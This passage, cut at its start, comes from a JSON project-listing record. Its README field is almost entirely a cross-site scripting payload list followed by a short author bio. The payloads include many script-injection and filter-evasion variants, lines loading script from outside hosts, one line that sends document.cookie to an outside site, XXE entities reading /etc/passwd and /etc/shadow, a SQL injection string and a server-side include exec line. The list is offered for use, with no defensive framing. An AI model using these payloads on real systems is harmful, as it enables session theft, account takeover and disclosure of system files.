classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389\u003e\u003cparam name=url value=javascript:document.vulnerable=true\u003e\u003c/object\u003e\n\u003cXML ID=I\u003e\u003cX\u003e\u003cC\u003e\u003c![\u003cIMG SRC=\"javas]]\u003c![cript:document.vulnerable=true;\"\u003e]]\u003c/C\u003e\u003c/X\u003e\u003c/xml\u003e\u003cSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML\u003e\u003c/span\u003e\n\u003cXML ID=\"xss\"\u003e\u003cI\u003e\u003cB\u003e\u003cIMG SRC=\"javas\u003c!-- --\u003ecript:document.vulnerable=true\"\u003e\u003c/B\u003e\u003c/I\u003e\u003c/XML\u003e\u003cSPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"\u003e\u003c/span\u003e\n\u003chtml\u003e\u003cBODY\u003e\u003c?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"\u003e\u003c?import namespace=\"t\" implementation=\"#default#time2\"\u003e\u003ct:set attributeName=\"innerHTML\" to=\"XSS\u003cSCRIPT DEFER\u003edocument.vulnerable=true\u003c/SCRIPT\u003e\"\u003e\u003c/BODY\u003e\u003c/html\u003e\n\u003c? echo('\u003cSCR)';echo('IPT\u003edocument.vulnerable=true\u003c/SCRIPT\u003e'); ?\u003e\n\u003cmeta HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=\u003cSCRIPT\u003edocument.vulnerable=true\u003c/SCRIPT\u003e\"\u003e\n\u003chead\u003e\u003cMETA HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"\u003e \u003c/HEAD\u003e+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-\n\u003ca href=\"javascript#document.vulnerable=true;\"\u003e\n\u003cdiv onmouseover=\"document.vulnerable=true;\"\u003e\n\u003cimg src=\"javascript:document.vulnerable=true;\"\u003e\n\u003cimg dynsrc=\"javascript:document.vulnerable=true;\"\u003e\n\u003cinput type=\"image\" dynsrc=\"javascript:document.vulnerable=true;\"\u003e\n\u003cbgsound src=\"javascript:document.vulnerable=true;\"\u003e\n\u0026\u003cscript\u003edocument.vulnerable=true;\u003c/script\u003e\n\u0026{document.vulnerable=true;};\n\u003cimg src=\u0026{document.vulnerable=true;};\u003e\n\u003clink rel=\"stylesheet\" href=\"javascript:document.vulnerable=true;\"\u003e\n\u003ciframe src=\"vbscript:document.vulnerable=true;\"\u003e\n\u003cimg src=\"mocha:document.vulnerable=true;\"\u003e\n\u003cimg src=\"livescript:document.vulnerable=true;\"\u003e\n\u003ca href=\"about:\u003cscript\u003edocument.vulnerable=true;\u003c/script\u003e\"\u003e\n\u003cmeta http-equiv=\"refresh\" content=\"0;url=javascript:document.vulnerable=true;\"\u003e\n\u003cbody onload=\"document.vulnerable=true;\"\u003e\n\u003cdiv style=\"background-image: url(javascript:document.vulnerable=true;);\"\u003e\n\u003cdiv style=\"behaviour: url([link to code]);\"\u003e\n\u003cdiv style=\"binding: url([link to code]);\"\u003e\n\u003cdiv style=\"width: expression(document.vulnerable=true;);\"\u003e\n\u003cstyle type=\"text/javascript\"\u003edocument.vulnerable=true;\u003c/style\u003e\n\u003cobject classid=\"clsid:...\" codebase=\"javascript:document.vulnerable=true;\"\u003e\n\u003cstyle\u003e\u003c!--\u003c/style\u003e\u003cscript\u003edocument.vulnerable=true;//--\u003e\u003c/script\u003e\n\u003c\u003cscript\u003edocument.vulnerable=true;\u003c/script\u003e\n\u003c![\u003c!--]]\u003cscript\u003edocument.vulnerable=true;//--\u003e\u003c/script\u003e\n\u003c!-- -- --\u003e\u003cscript\u003edocument.vulnerable=true;\u003c/script\u003e\u003c!-- -- --\u003e\n\u003cimg src=\"blah\"onmouseover=\"document.vulnerable=true;\"\u003e\n\u003cimg src=\"blah\u003e\" onmouseover=\"document.vulnerable=true;\"\u003e\n\u003cxml src=\"javascript:document.vulnerable=true;\"\u003e\n\u003cxml id=\"X\"\u003e\u003ca\u003e\u003cb\u003e\u003cscript\u003edocument.vulnerable=true;\u003c/script\u003e;\u003c/b\u003e\u003c/a\u003e\u003c/xml\u003e\n\u003cdiv datafld=\"b\" dataformatas=\"html\" datasrc=\"#X\"\u003e\u003c/div\u003e\n[\\xC0][\\xBC]script\u003edocument.vulnerable=true;[\\xC0][\\xBC]/script\u003e\n\u003cstyle\u003e@import'http://www.securitycompass.com/xss.css';\u003c/style\u003e\n\u003cmeta HTTP-EQUIV=\"Link\" Content=\"\u003chttp://www.securitycompass.com/xss.css\u003e; REL=stylesheet\"\u003e\n\u003cstyle\u003eBODY{-moz-binding:url(\"http://www.securitycompass.com/xssmoz.xml#xss\")}\u003c/style\u003e\n\u003cOBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://www.securitycompass.com/scriptlet.html\"\u003e\u003c/object\u003e\n\u003cHTML xmlns:xss\u003e\u003c?import namespace=\"xss\" implementation=\"http://www.securitycompass.com/xss.htc\"\u003e\u003cxss:xss\u003eXSS\u003c/xss:xss\u003e\u003c/html\u003e\n\u003cscript SRC=\"http://www.securitycompass.com/xss.jpg\"\u003e\u003c/script\u003e\n\u003c!--#exec cmd=\"/bin/echo '\u003cSCR'\"--\u003e\u003c!--#exec cmd=\"/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js\u003e\u003c/SCRIPT\u003e'\"--\u003e\n\u003cscript a=\"\u003e\" SRC=\"http://www.securitycompass.com/xss.js\"\u003e\u003c/script\u003e\n\u003cscript =\"\u003e\" SRC=\"http://www.securitycompass.com/xss.js\"\u003e\u003c/script\u003e\n\u003cscript a=\"\u003e\" '' SRC=\"http://www.securitycompass.com/xss.js\"\u003e\u003c/script\u003e\n\u003cscript \"a='\u003e'\" SRC=\"http://www.securitycompass.com/xss.js\"\u003e\u003c/script\u003e\n\u003cscript a=`\u003e` SRC=\"http://www.securitycompass.com/xss.js\"\u003e\u003c/script\u003e\n\u003cscript a=\"\u003e'\u003e\" SRC=\"http://www.securitycompass.com/xss.js\"\u003e\u003c/script\u003e\n\u003cscript\u003edocument.write(\"\u003cSCRI\");\u003c/SCRIPT\u003ePT SRC=\"http://www.securitycompass.com/xss.js\"\u003e\u003c/script\u003e\n\u003cdiv style=\"binding: url(http://www.securitycompass.com/xss.js);\"\u003e [Mozilla]\n\";\u003e;\u003c;BODY onload!#$%\u0026;()*~+-_.,:;?@[/|\\]^`=alert(\";XSS\";)\u003e;\n\u003c;/script\u003e;\u003c;script\u003e;alert(1)\u003c;/script\u003e;\n\u003c;/br style=a:expression(alert())\u003e;\n\u003c;scrscriptipt\u003e;alert(1)\u003c;/scrscriptipt\u003e;\n\u003c;br size=\\\";\u0026;{alert(\u0026#039;XSS\u0026#039;)}\\\";\u003e;\nperl -e \u0026#039;print \\\";\u003c;IMG SRC=java\\0script:alert(\\\";XSS\\\";)\u003e;\\\";;\u0026#039; \u003e; out\nperl -e \u0026#039;print \\\";\u003c;SCR\\0IPT\u003e;alert(\\\";XSS\\\";)\u003c;/SCR\\0IPT\u003e;\\\";;\u0026#039; \u003e; out\n\u003c~/XSS/*-*/STYLE=xss:e/**/xpression(window.location=\"http://www.procheckup.com/?sid=\"%2bdocument.cookie)\u003e\n\u003c~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))\u003e\n\u003c~/XSS STYLE=xss:expression(alert('XSS'))\u003e\n\"\u003e\u003cscript\u003ealert('XSS')\u003c/script\u003e\n\u003c/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))\u003e\nXSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))\u003e\nXSS STYLE=xss:e/**/xpression(alert('XSS'))\u003e\n\u003c/XSS STYLE=xss:expression(alert('XSS'))\u003e\n\u003e\"\u003e\u003cscript\u003ealert(\"XSS\")\u003c/script\u003e\u0026\n\"\u003e\u003cSTYLE\u003e@import\"javascript:alert('XSS')\";\u003c/STYLE\u003e\n\u003e\"'\u003e\u003cimg%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)\u003e\n\u003e%22%27\u003e\u003cimg%20src%3d%22javascript:alert(%27%20XSS%27)%22\u003e\n'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'\n'';!--\"\u003cXSS\u003e=\u0026{()}\n\u003cIMG SRC=JaVaScRiPt:alert('XSS')\u003e\n\u003cIMG SRC=JaVaScRiPt:alert(\u0026quot;XSS\u003cWBR\u003e\u0026quot;)\u003e\n\u003cIMGSRC=\u0026#106;\u0026#97;\u0026#118;\u0026#97;\u0026\u003cWBR\u003e#115;\u0026#99;\u0026#114;\u0026#105;\u0026#112;\u0026\u003cWBR\u003e#116;\u0026#58;\u0026#97;\u0026#108;\u0026#101;\u0026\u003cWBR\u003e#114;\u0026#116;\u0026#40;\u0026#39;\u0026#88;\u0026#83\u003cWBR\u003e;\u0026#83;\u0026#39;\u0026#41\u003e\n\u003cIMGSRC=\u0026#0000106\u0026#0000097\u0026\u003cWBR\u003e#0000118\u0026#0000097\u0026#0000115\u0026\u003cWBR\u003e#0000099\u0026#0000114\u0026#0000105\u0026\u003cWBR\u003e#0000112\u0026#0000116\u0026#0000058\u0026\u003cWBR\u003e#0000097\u0026#0000108\u0026#0000101\u0026\u003cWBR\u003e#0000114\u0026#0000116\u0026#0000040\u0026\u003cWBR\u003e#0000039\u0026#0000088\u0026#0000083\u0026\u003cWBR\u003e#0000083\u0026#0000039\u0026#0000041\u003e\n\u003cIMGSRC=\u0026#x6A\u0026#x61\u0026#x76\u0026#x61\u0026#x73\u0026\u003cWBR\u003e#x63\u0026#x72\u0026#x69\u0026#x70\u0026#x74\u0026#x3A\u0026\u003cWBR\u003e#x61\u0026#x6C\u0026#x65\u0026#x72\u0026#x74\u0026#x28\u0026\u003cWBR\u003e#x27\u0026#x58\u0026#x53\u0026#x53\u0026#x27\u0026#x29\u003e\n\u003cIMG SRC=\"jav\u0026#x0A;ascript:alert(\u003cWBR\u003e'XSS');\"\u003e\n\u003cIMG SRC=\"jav\u0026#x0D;ascript:alert(\u003cWBR\u003e'XSS');\"\u003e\n\u003c![CDATA[\u003cscript\u003evar n=0;while(true){n++;}\u003c/script\u003e]]\u003e\n\u003c?xml version=\"1.0\" encoding=\"ISO-8859-1\"?\u003e\u003cfoo\u003e\u003c![CDATA[\u003c]]\u003eSCRIPT\u003c![CDATA[\u003e]]\u003ealert('gotcha');\u003c![CDATA[\u003c]]\u003e/SCRIPT\u003c![CDATA[\u003e]]\u003e\u003c/foo\u003e\n\u003c?xml version=\"1.0\" encoding=\"ISO-8859-1\"?\u003e\u003cfoo\u003e\u003c![CDATA[' or 1=1 or ''=']]\u003e\u003c/foof\u003e\n\u003c?xml version=\"1.0\" encoding=\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [\u003c!ELEMENT foo ANY\u003e\u003c!ENTITY xxe SYSTEM \"file://c:/boot.ini\"\u003e]\u003e\u003cfoo\u003e\u0026xee;\u003c/foo\u003e\n\u003c?xml version=\"1.0\" encoding=\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [\u003c!ELEMENT foo ANY\u003e\u003c!ENTITY xxe SYSTEM \"file:///etc/passwd\"\u003e]\u003e\u003cfoo\u003e\u0026xee;\u003c/foo\u003e\n\u003c?xml version=\"1.0\" encoding=\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [\u003c!ELEMENT foo ANY\u003e\u003c!ENTITY xxe SYSTEM \"file:///etc/shadow\"\u003e]\u003e\u003cfoo\u003e\u0026xee;\u003c/foo\u003e\n\u003c?xml version=\"1.0\" encoding=\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [\u003c!ELEMENT foo ANY\u003e\u003c!ENTITY xxe SYSTEM \"file:///dev/random\"\u003e]\u003e\u003cfoo\u003e\u0026xee;\u003c/foo\u003e\n\u003cscript\u003ealert('XSS')\u003c/script\u003e\n%3cscript%3ealert('XSS')%3c/script%3e\n%22%3e%3cscript%3ealert('XSS')%3c/script%3e\n\u003cIMG SRC=\"javascript:alert('XSS');\"\u003e\n\u003cIMG SRC=javascript:alert(\u0026quot;XSS\u0026quot;)\u003e\n\u003cIMG SRC=javascript:alert('XSS')\u003e\n\u003cimg src=xss onerror=alert(1)\u003e\n\u003cIMG \"\"\"\u003e\u003cSCRIPT\u003ealert(\"XSS\")\u003c/SCRIPT\u003e\"\u003e\n\u003cIMG SRC=javascript:alert(String.fromCharCode(88,83,83))\u003e\n\u003cIMG SRC=\"jav ascript:alert('XSS');\"\u003e\n\u003cIMG SRC=\"jav\u0026#x09;ascript:alert('XSS');\"\u003e\n\u003cIMG SRC=\u0026#106;\u0026#97;\u0026#118;\u0026#97;\u0026#115;\u0026#99;\u0026#114;\u0026#105;\u0026#112;\u0026#116;\u0026#58;\u0026#97;\u0026#108;\u0026#101;\u0026#114;\u0026#116;\u0026#40;\u0026#39;\u0026#88;\u0026#83;\u0026#83;\u0026#39;\u0026#41;\u003e\n\u003cIMG SRC=\u0026#0000106\u0026#0000097\u0026#0000118\u0026#0000097\u0026#0000115\u0026#0000099\u0026#0000114\u0026#0000105\u0026#0000112\u0026#0000116\u0026#0000058\u0026#0000097\u0026#0000108\u0026#0000101\u0026#0000114\u0026#0000116\u0026#0000040\u0026#0000039\u0026#0000088\u0026#0000083\u0026#0000083\u0026#0000039\u0026#0000041\u003e\n\u003cIMG SRC=\u0026#x6A\u0026#x61\u0026#x76\u0026#x61\u0026#x73\u0026#x63\u0026#x72\u0026#x69\u0026#x70\u0026#x74\u0026#x3A\u0026#x61\u0026#x6C\u0026#x65\u0026#x72\u0026#x74\u0026#x28\u0026#x27\u0026#x58\u0026#x53\u0026#x53\u0026#x27\u0026#x29\u003e\n\u003cBODY BACKGROUND=\"javascript:alert('XSS')\"\u003e\n\u003cBODY ONLOAD=alert('XSS')\u003e\n\u003cINPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\"\u003e\n\u003cIMG SRC=\"javascript:alert('XSS')\"\n\u003ciframe src=http://ha.ckers.org/scriptlet.html \u003c\n\u003c\u003cSCRIPT\u003ealert(\"XSS\");//\u003c\u003c/SCRIPT\u003e\n%253cscript%253ealert(1)%253c/script%253e\n\"\u003e\u003cs\"%2b\"cript\u003ealert(document.cookie)\u003c/script\u003e\nfoo\u003cscript\u003ealert(1)\u003c/script\u003e\n\u003cscr\u003cscript\u003eipt\u003ealert(1)\u003c/scr\u003c/script\u003eipt\u003e\n\u003cSCRIPT\u003eString.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)\u003c/SCRIPT\u003e\n';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--\u003e\u003c/SCRIPT\u003e\"\u003e'\u003e\u003cSCRIPT\u003ealert(String.fromCharCode(88,83,83))\u003c/SCRIPT\u003e\n\u003cmarquee onstart='javascript:alert('1');'\u003e=(◕_◕)=\n```\n\nMost XSS command reached from some different sources, Thanks to Ismail Tasdelen.\n\n---------\n\n# Max Base\n\nMy nickname is Max, Programming language developer, Full-stack programmer. I love computer scientists, researchers, and compilers. ([Max Base](https://maxbase.org/))\n\n## Asrez Team\n\nA team includes some programmer, developer, designer, researcher(s) especially Max Base.\n\n[Asrez Team](https://www.asrez.com/)\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbasemax%2Fgithubvulnerabilityxss","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbasemax%2Fgithubvulnerabilityxss","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbasemax%2Fgithubvulnerabilityxss/lists"}